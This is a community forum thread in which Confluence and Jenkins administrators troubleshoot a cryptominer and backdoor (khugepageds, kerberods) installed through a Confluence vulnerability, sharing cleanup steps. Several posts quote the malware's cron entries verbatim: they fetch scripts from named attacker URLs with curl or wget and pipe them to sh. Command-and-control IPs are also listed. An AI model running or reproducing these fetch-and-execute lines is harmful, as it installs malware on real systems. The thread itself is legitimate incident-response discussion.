khugepageds eating all of the CPU

dovi5988 April 11, 2019

Hi,


We have had Confluence hosted on our own box for a few years now with no issues, running under its own user. Randomly, yesterday the process khugepageds showed up using 600% of the CPU (the box has 8 CPUs in total; the rest are being used by Java). I stopped Confluence and the process lives on. When I look at the processes I see:

501 9063 625 0.0 144936 13700 ? Ssl Apr10 9422:08 /tmp/khugepageds =/tmp/kerberods TERM=linux JRE_HOME=/opt/atlassian/confluence/jre/ NLSPATH=/usr/dt/lib/nls/msg/%L/%N.cat PATH=/sbin:/usr/sbin:/bin:/usr/bin:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin RUNLEVEL=3 runlevel=3 PWD=/opt/atlassian/confluence/bin LANGSH_SOURCED=1 LANG=en_US.UTF-8 PREVLEVEL=N previous=N XFILESEARCHPATH=/usr/dt/app-defaults/%L/Dt CATALINA_OPTS= -Xms1280m -Xmx1280m -XX:MaxPermSize=384m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2017-11-21_01-34-45.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution CONF_USER=confluence CONSOLETYPE=serial SHLVL=7 HOME= CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid UPSTART_INSTANCE= UPSTART_EVENTS=runlevel UPSTART_JOB=rc _=/tmp/kerberods __DAEMON_FD_3=2f746d702f2e583131756e6978: __DAEMON_STAGE=

 

The log file was last written to on 2019-02-22. Since it stayed up after I stopped Confluence, is it safe to kill? I don't want to kill a process that could potentially break my Confluence setup.

 

 

17 comments

Deleted user April 11, 2019

Same thing here... we've been running Confluence without issue for a few years; now this "khugepageds process is at near 100% utilization" issue is popping up as of yesterday.

I can kill the process, but it starts back up a few minutes later.

I rebooted the server yesterday and it started again a few hours later.

I temporarily froze the process with (of course the number is the pid):

sudo kill -STOP 12128

...but that doesn't seem like a good solution. EDIT: After 3 hours the stopped process was apparently killed and a new one spawned, as I just had to do the same thing with a new PID.

Confluence bug?

Another EDIT: This article isn't directly about Confluence... it looks like THP can be disabled at boot (https://confluence.atlassian.com/bamkb/performance-issue-with-red-hat-enterprise-linux-rhel-781189906.html -> https://access.redhat.com/solutions/46111) but I cannot test this during business hours.
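For reference, the boot-time method in the linked Red Hat article is a single kernel parameter. A minimal sketch, assuming a RHEL/CentOS grub2 layout (file locations and the regenerate command differ by distro); note this controls the real kernel khugepaged, which is separate from the lookalike process discussed later in this thread:

```shell
# /etc/default/grub -- append to the existing kernel command line
# (the "..." stands for whatever parameters are already there)
GRUB_CMDLINE_LINUX="... transparent_hugepage=never"

# then regenerate the grub config and reboot (RHEL/CentOS):
#   grub2-mkconfig -o /boot/grub2/grub.cfg
```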

dovi5988 April 11, 2019

Can someone from Atlassian reach out to me directly on this?

Deleted user April 11, 2019

Yeah, there was a malicious looking cronjob. How did that happen? Has this happened to you before?

Deleted user April 11, 2019

I don't think Atlassian watches these forums... thank you for sharing the link.

eleven12 April 11, 2019

Thank you Nick Smith! I noticed that the khugepageds was starting every 10 minutes and your note reminded me to check the user confluence's crontab entries. Sure enough, there was a suspicious entry that started every 10 minutes. I deleted it and the problem appears to have disappeared. I also upgraded to the latest version of Confluence.

Deleted user April 11, 2019

David gave me the original idea.

I can't take this system out of production at the moment for the updates, so I followed the mitigation steps for now (disable the Widget and WebDAV plug-ins). It's been 30 minutes since I did that and there's been no more suspicious-looking activity.

Johannes Schurer April 11, 2019

It's a virus. khugepageds is an obfuscated crypto miner, and there is a second process, kerberods, that is a backdoor using SSH to open reverse tunnels.

It's triggered by the crontab of the user Confluence is running under.

Stop and disable cron. Kill both processes. Update.

eleven12 April 11, 2019

I am having the same problem on my Linux server running Ubuntu 16.04 LTS. When running top, khugepageds is at 100% on each core. It and kerberods are both listed as having user "conflue+". I have added the line to the grub file to set transparent_hugepage=never to disable it at boot time, set "never" in the transparent_hugepage/enabled and defrag files to disable it at run time, and run hugeadm to disable it. Nothing works. I can kill the process, but it will restart after a while. Checking /sys/kernel/mm/transparent_hugepage/enabled shows "always madvise [never]", and the number of huge pages being managed is 0. I have stopped Confluence. But nothing can stop khugepageds! :)

I am suspicious that it is at least Confluence (or Java) related due to the user being Confluence. I thought 

Zoran Pucar April 16, 2019

Your settings are not working because it is not the kernel's khugepaged doing the load, but another binary named khugepageds trying to "hide" in your system. It is malicious software.

As previously stated in this thread, there are ways of disabling it.

Daniel Eads
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
April 12, 2019

What you've described is an active exploit that attacks the CVE-2019-3396 Widget Connector vulnerability from March 20th (see Confluence Security Advisory - 2019-03-20).

The first step in fixing this is upgrading to a Confluence version that is not affected by the vulnerability. The latest releases are:

Secondly, the LSD malware cleanup tool will be useful for removing the Kerberods malware. I would recommend executing cleanup after upgrading Confluence to a patched version so there's no possibility of re-infection while you work on the upgrade.

Please let me know if you have more questions!
Daniel | Atlassian Support

Robert Musto April 15, 2019

Our Confluence will not load right since we were infected. We followed the guide, and trying to get Atlassian support is like pulling teeth; actually, I would rather have my teeth pulled than try to get valid support from this team.

Deleted user April 15, 2019

Hi Robert,

I can't speak for your installation, but I can tell you what I did to mitigate on our system (in lieu of Atlassian's disappointing technical support... had I known about the support bait and switch that would happen, I would have heavily lobbied against going this direction a few years ago).

Anyway: log into the console and kill the kerberods and khugepageds processes by ascertaining their process IDs and killing them with sudo (hopefully you are not running Confluence as the root user):

pidof khugepageds
12345 <-- for example
sudo kill 12345

pidof kerberods
67890 <-- for example
sudo kill 67890

Open the Confluence user account's cron file in a text editor

sudo vim /var/spool/cron/confluence

Clear out any malicious entries (probably all of them unless you have added special entries).

I then followed Atlassian's guide to mitigate by manually disabling the WebDAV and Widget Connector plugins.

There has been no further evidence of malicious activity.

We were fortunate that we run this on an Amazon M4 and not on a T instance as this would have eaten up the CPU credits pretty quickly and removed our ability to even log into the console (or ran up a bill in unlimited mode which really could have sucked).

As soon as I can find an opportunity I am going to upgrade (can I just say major version upgrades are a pain).

Daniel Eads
Atlassian Team
April 15, 2019

Hey @Robert Musto , I'm really sorry to hear that you had a bad experience getting support. I took a look at the tickets you had opened and while there were a few duplicates created, it seems like our support engineers were able to assist you over the phone today. If there were some things you felt needed improvement, we'd like to hear about that - you can reach out to me directly at deads at atlassian.com or reply on the ticket our team helped you with today.

@[deleted] please reach out to me via email as well (deads at atlassian.com) if you need help contacting support directly. I'm not sure what you mean by bait and switch - the only Confluence license I see on your account expired several years ago, so please reach out to me with concerns! We are active on Community but due to the sheer volume it's not guaranteed that we can respond to all threads directly. Part of what makes Community work is that everyone is able to contribute answers for the benefit of everyone. You've added some valuable info to this conversation, and that will definitely help people coming in to the thread looking for a solution!

Overall I will say that Dovid's original issue was an infection from the kerberods malware. Other attacks against the same vulnerability may be trying to insert different payloads, so it's possible that more recent infections might be from different malware. The steps noted by @[deleted] are a great starting point to doing a general malware cleanup while utilizing tools tailored to the specific malware infection.

Daniel | Atlassian Support

Kirk, Becky April 15, 2019

My environment experienced the same issue. We followed the Atlassian-provided troubleshooting steps to a T. Is anyone else continuing to experience fallout AFTER upgrading Confluence? It seems the upgrade wasn't enough, and we are continuing to experience malware issues in our self-hosted environment.

 

Please let me know.

Daniel Eads
Atlassian Team
April 15, 2019

Hey @Kirk, Becky ,

While the first attack seemed to focus on injecting the kerberods malware, we are seeing reports of other attacks trying to deliver payloads of different malware. I can see that you've been working with our senior Support Engineers via ticket on support.atlassian.com. It's not clear from the ticket that Confluence was upgraded, so if possible I suggest adding that information (or the support zips / info requested by the support team) to the ticket.

After adding that info to the ticket, as a next step you can look at the output of top (if you are on Linux) to find any processes consuming large amounts of CPU. If Confluence is not running, you should be able to kill any processes running under the confluence user account. Use the kill -9 command followed by the process ID (pid) to kill the high-CPU processes running under the Confluence account.

Nick's advice to check the crontab for malicious entries is also very good:

Open the Confluence user account's cron file in a text editor

sudo vim /var/spool/cron/confluence

Clear out any malicious entries (probably all of them unless you have added special entries).

It's difficult for the support team to help in your specific case without the requested info though, so please add that to the ticket.

Daniel | Atlassian Support

Dovid Bender April 16, 2019

I would add that you need to clean out the cron fairly fast. So long as either kerberods is running or the cron job is there, it's going to be an endless game of whack-a-mole. Please see my note below to @Andrea C . You need to do it almost all at once, e.g.:

> /var/spool/cron/confluence ; kill -9 PID_OF_kerberods ; kill -9 PID_OF_khugepageds


I say to use > and not to edit with vim because in the time it takes to launch the editor, the cron could have restarted it.

 

Make sure you aren't clearing out any crons that you do want for user confluence! Using > will clean out the whole file.
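The race described here is exactly why `>` helps: truncation happens in a single step, with no editor start-up window for the cron job to win. A safe demonstration on a throwaway file (not the real cron file):

```shell
# Simulate a crontab file, then truncate it the way the post suggests
f=$(mktemp)
printf 'some malicious entry\n' > "$f"   # stand-in for the bad cron line
: > "$f"        # ': >' is the portable spelling of bare '>' truncation
[ -s "$f" ] || echo "file is now empty"
rm -f "$f"
```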

Deleted user April 16, 2019

Is there anything else to worry about except for the malicious infection by the kerberods malware? Could the attacker have been able to dump the database or get the private key from the keystore? Is it useful to run the system "normally" again after upgrading, or is it better to set up a new Confluence?

Dovid Bender April 16, 2019

That really depends on how you were running Confluence. If you were running it as root, they could have gotten access to anything. What user was Confluence running as? That being said, we tested the malware over and over in a sandbox environment, and the only thing we saw it was interested in was harnessing CPU cycles. The moment we killed all processes and cleaned out the cron jobs, all network traffic (other than the SSH session to the sandbox) ceased. If you were running as root, to be safe I would suggest setting up a new system and migrating over all of your data.

Andrea C April 16, 2019

I'm having the exact same problem, I have an entry in the cron file but it regenerates even if I delete it. 

My problem is that the process kerberods appears for only a few seconds after the Confluence process goes down.

Please help, as my production environment is currently down. I already upgraded to the latest version, but that didn't fix it.

Dovid Bender April 16, 2019

@Andrea C It seems as if it's still running somewhere and you aren't fully cleaning it out. Based on the output of top above, it seems you are running it as user confluence, which is a good thing. Here is what I would do:

1) cat /var/spool/cron/confluence # Verify that there are no other cronjobs there for user confluence. If there are back them up.

2) ps auxef | grep 'khugepageds\|kerberods'

Get the pids of the above processes. You need to run the below in this order:

> /var/spool/cron/confluence ; kill -9 PID_OF_kerberods ; kill -9 PID_OF_khugepageds

3) cat /var/spool/cron/confluence # verify that it's empty

4) ps auxef | grep 'khugepageds\|kerberods' # verify they are not running.

5) rm -rf /tmp/khugepageds ; rm -rf /tmp/kerberods
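The five steps above can be sketched as one small function. This is a sketch under assumptions from this thread (cron file path, binary names, and /tmp drop location are the ones reported here); it backs up the crontab first so legitimate entries aren't lost:

```shell
#!/bin/sh
# Hedged sketch of the five steps above -- verify paths and process
# names on your own system before running this as root.
clean_kerberods() {
    cron_file="$1"   # e.g. /var/spool/cron/confluence
    drop_dir="$2"    # e.g. /tmp
    # step 1: back up the crontab so legitimate entries can be restored
    if [ -f "$cron_file" ]; then
        cp "$cron_file" "$cron_file.bak"
    fi
    # empty the crontab BEFORE killing, so nothing respawns (order matters)
    : > "$cron_file"
    # steps 2-4: kill both processes by exact name, if present
    pkill -9 -x kerberods   2>/dev/null || true
    pkill -9 -x khugepageds 2>/dev/null || true
    # step 5: delete the dropped binaries
    rm -f "$drop_dir/khugepageds" "$drop_dir/kerberods"
}
# usage (as root): clean_kerberods /var/spool/cron/confluence /tmp
```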

Andrea C April 16, 2019

@dovi5988 thanks a lot for your help Dovid!

Now Confluence has been online for two and a half hours, and the only thing I did was try to run that malware cleanup tool. I managed to run it, but I don't think it executed all the lines of the script.

Here is what was happening when confluence was going down:

  1. confluence is running as the user confluence (not root), two processes since I have concurrent editing on.
  2. the cpu was spiking up to more than 100%
  3. Both Confluence processes were going down.
  4. Only the kerberods process was running, for just a few seconds, and then it disappeared, as you saw from the screenshot.

Now, even though Confluence is currently up, I want to make sure that everything is fine as I don't want any more surprises.

This is the output after running the first command you suggested:

*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh

This is definitely not legit, right?

Also, how can I get the pid of kerberods since it's not running?
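Entries like the one above follow a recognizable shape: a download command piped straight into a shell. A quick check can flag them; `find_suspicious` is a hypothetical helper and the regex is an assumption that won't catch every variant:

```shell
# Print crontab lines that pipe curl/wget output into a shell
find_suspicious() {
    grep -E '(curl|wget)[^|]*[|][[:space:]]*(sh|bash)' "$1"
}
# usage: find_suspicious /var/spool/cron/confluence
```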

Andrea C April 16, 2019

I deleted the cron entry and it didn't reappear again.

Dovid Bender April 16, 2019

@Andrea C

1) make sure the cron is empty.

2) ps auxef | grep 'khugepageds\|kerberods' # verify they are not running.

 

If they all come up clean you should be good. Before when you were killing it, the cron was starting it up again.

Andrea C April 16, 2019

@dovi5988 cron is still empty. When I'm running the second command I get a long result (I'm not copying it all): 

root      4296  0.0  0.0 110512  2044 pts/0    S+   14:43   0:00                                      \_ grep --color=auto khugepageds\|kerberods LESS_TERMCAP_mb=?[01;31m HOSTNAME=ip-172-31-27-207 LESS_TERMCAP_md=?[01;38;5;208m LESS_TERMCAP_me=?[0m SHELL=/bin/bash TERM=xterm-256color HISTSIZE=1000 EC2_AMITOOL_HOME=/opt/aws/amitools/ec2 LESS_TERMCAP_ue=?[0m USER=root LS_COLORS

Dovid Bender April 16, 2019

That's probably your grep command. Try this:
ps auxef | grep 'khugepageds\|kerberods' | grep -v grep

If that comes back with nothing you should be good.
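An alternative that sidesteps the self-match problem entirely is pgrep, which matches process names and never matches itself (assuming procps-ng, which ships with most modern distros):

```shell
# Exact-name match for either binary; -a prints the full command line.
# If neither process is running, pgrep prints nothing and exits 1.
pgrep -a -x 'khugepageds|kerberods' || echo "neither process is running"
```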

Andrea C April 16, 2019

it comes back with nothing.

Now I have another Confluence instance with a different problem: a process by the confluence user with an empty command. I tried sudo kill 2864 but it didn't do anything.


Dovid Bender April 16, 2019

Try this:

ps auxef > /tmp/ll

 

Then edit the file /tmp/ll and see if you can find what's causing it to start. From my own experience, when Confluence starts it's a resource hog. The malware is set to kill anything using too much CPU. Did you upgrade your system? If you didn't, you will keep getting hit.

Andrea C April 16, 2019

Did someone use the LSD malware cleanup tool? I copied busybox, but when I run the script it gives a permission-denied error, and I'm logged in as root. Clearly I need to change some permissions in order to make it run properly.

Dovid Bender April 16, 2019

@Andrea C I am not sure if there is an option here, but if you can, private message me and we can take a look at it together.

warthog April 16, 2019

Don't mean to hijack, but I'm having an issue with busybox as well:

 

./clear_kerberods.sh: line 1: syntax error near unexpected token `newline'
./clear_kerberods.sh: line 1: `<!DOCTYPE html>'

Dovid Bender April 16, 2019

@warthog Were you running confluence as root or another user? If the latter please see what I wrote to @Andrea C . You need to clear out the cronjob and then kill the processes.

warthog April 16, 2019

I was running as the confluence user; running the steps now, thanks!

warthog April 16, 2019

We got hit with this as well and are trying to clean it up, but I keep getting kicked out when I try to sudo as the confluence user to kill cron.

 

Does anyone know what data this was mining for? Is just upgrading safe, or will they still have access to data?

Dovid Bender April 16, 2019

No need to sudo. You can clean it from root:

1) su - root

2) > /var/spool/cron/confluence

 

No one knows for sure what it did, but from all the research I did, it seemed to be limited to harnessing CPU cycles. Sniffing the traffic seemed to confirm the same.

warthog April 16, 2019

So one thing I noticed: it downloaded and installed Python 2.7.12.

Dovid Bender April 16, 2019

How did you see that? If you weren't running as root, it should not have had permission to install anything.

warthog April 16, 2019

I had set it up to run as the confluence user. I'm looking into it now; just in case, I changed my root password.

Dovid Bender April 16, 2019

Feel free to email me at: dovi5988 -- gmail.com

Jeff Turner April 16, 2019

As a consultant, I cleaned up a client's hacked Confluence on Monday, and wrote up the experience:

What to do when your Confluence is hacked

Feedback welcome.

Brian Hill April 17, 2019

Excellent write-up @Jeff Turner - thx for taking the extra time to document intervention steps for the benefit of others.

Jeff Turner
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
April 25, 2019

According to this alertlogic.com blog, this vulnerability is also being exploited to launch ransomware.

llondono April 17, 2019

Was anyone able to find out how they were able to get the crontab entry added? Was it because they had access through the specified add-ons, which had permission to the crontab?

Dovid Bender April 17, 2019

They ran the curl command, which called the bash script (via pastebin), which gets kerberods, which creates the cronjob.

Roo April 19, 2019

@dovi5988 I think what llondono was asking is how the crontab entry was added. I am trying to figure this out too. Can anyone chime in?

Zoran Pucar April 20, 2019

Roo, the bug allows remote code execution! This means an attacker can execute any command as the confluence user on the system running it, including adding crontab entries.

Dovid Bender April 17, 2019

FYI: Another advisory was released... time to upgrade again. https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

David Yu
Rising Star
April 18, 2019

Hope everyone was able to clean their systems up. I'm subscribed to all Tech Alerts to stay on top of security vulnerabilities, but in this case Atlassian did not e-mail me; a colleague notified me instead.

I reached out to their support and they fixed a bug in their mailer, so it's a good time to check your email notification preferences at https://my.atlassian.com and ensure you're listed as a Technical Contact for your product.

abhijitsharma806 April 19, 2019

Hi All

I have also faced the same type of issue on my Jenkins server.

/tmp/khugepageds used 200% CPU on my AWS t2.medium instance.

I have taken some steps. Please follow them; they may help you guys.

1 - Using top/htop, find the pid of /tmp/khugepageds (most probably the lowest-numbered pid is the parent).

2 - Using that PID, do: # lsof -p 1919

3 - Then you can get the IP

4 - Go to your firewall rules, inbound & outbound, and block that IP.

5 - Now check cat /var/spool/cron/crontabs/jenkins to see whether any crontab entries are present.

6 - I traced that IP's location: it is coming from the United States, and the ISP is DigitalOcean LLC.


Like Dovid Bender likes this
abhijitsharma806 April 19, 2019

Try to remove the cron file. For me the location is /var/spool/cron/crontabs/jenkins

*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh

7 - I blocked the IP in the AWS VPC NACL; after that, the CPU usage dropped. If possible, restart the Jenkins services.

This may help you guys.

 


Dovid Bender April 19, 2019

The DigitalOcean IP seems to be the phone-home IP. The other IPs that you see are the malware attacking other hosts in the same /16 as you. It's trying to get your host to attack others.

abhijitsharma806 April 19, 2019

8 - Please try to clean the /tmp folder (# rm -rf /tmp/*)

Thank you @dovi5988. If possible, can you please check the attached screenshot? I SSHed to my Jenkins server and ran the lsof, and my home public IPs are different.

If it is a phone-home IP, then why was the /tmp/khugepageds process trying to access it? After blocking it at the AWS NACL level, it is no longer able to make contact.

Zoran Pucar April 19, 2019

One problem is that the cron job can be hard to trace, depending on the user Confluence runs as.

Fortunately, the exploit doesn't do privilege escalation and can only run as the confluence user. Too bad if you are running Confluence as root.

Now, since the exploit can work differently depending on distro and user, one way to remove "the teeth" from the cron job (while searching for it) is to remove access to pastebin.com. Note this is for IPv4; pastebin.com has AAAA records, so if you are using IPv6 make sure you add those rules too. The method below is only for reference and won't persist if you reboot the server. This way, even if you leave the cron job running, it won't work:

[root@iowerwatch ~]# host pastebin.com

pastebin.com has address 104.20.209.21

pastebin.com has address 104.20.208.21

...

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.209.21/32 -j REJECT --reject-with icmp-port-unreachable

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.208.21/32 -j REJECT --reject-with icmp-port-unreachable
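The lookup-and-block steps above can be scripted. A sketch under assumptions: `extract_ips` is a hypothetical helper that parses `host` output, and the commented loop mirrors the iptables rules above (root required, still not reboot-persistent):

```shell
#!/bin/sh
# Pull IPv4 addresses out of `host` output. Only "has address" lines
# match, so IPv6 ("has IPv6 address") records are deliberately skipped
# and must be blocked separately with ip6tables.
extract_ips() {
    awk '/has address/ { print $NF }'
}

# usage (as root):
#   host -t a pastebin.com | extract_ips | while read -r ip; do
#       iptables -A OUTPUT -d "$ip/32" -j REJECT --reject-with icmp-port-unreachable
#   done
```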

abhijitsharma806 April 19, 2019

Hi @dovi5988 

Inside that /var/spool/cron/crontabs/jenkins file some URLs are listed; if you open a URL you can find the scripts:

https://pastebin.com/raw/wR3ETdbi
https://pastebin.com/raw/Zk7Jv9j2
https://pastebin.com/raw/0Sxacvsh

 

Please find the screenshot also; the IPs are already mentioned inside the script.

There are 2 IPs. Hope this will help:

119.9.106.27 and
104.130.210.206


abhijitsharma806 April 19, 2019

I found one more cron entry for the Jenkins user, and deleted that also.


bluelight April 25, 2019

dd.heheda.tk resolves to Cloudflare: https://db-ip.com/104.18.59.79

I opened a support ticket https://support.cloudflare.com/hc/requests/1677155

Thanks
